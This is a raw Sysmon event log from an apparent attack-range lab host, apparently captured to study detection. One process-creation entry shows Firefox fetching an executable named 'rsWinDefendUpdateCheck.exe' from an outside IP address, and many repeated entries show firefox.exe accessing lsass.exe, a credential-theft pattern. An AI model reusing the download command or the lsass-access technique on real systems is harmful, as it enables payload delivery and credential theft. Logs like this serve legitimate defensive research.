20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6223d7c4-929b-4676-9188-8c6db6e2304b} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 4652 19fbb072e58 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000048265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.012{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 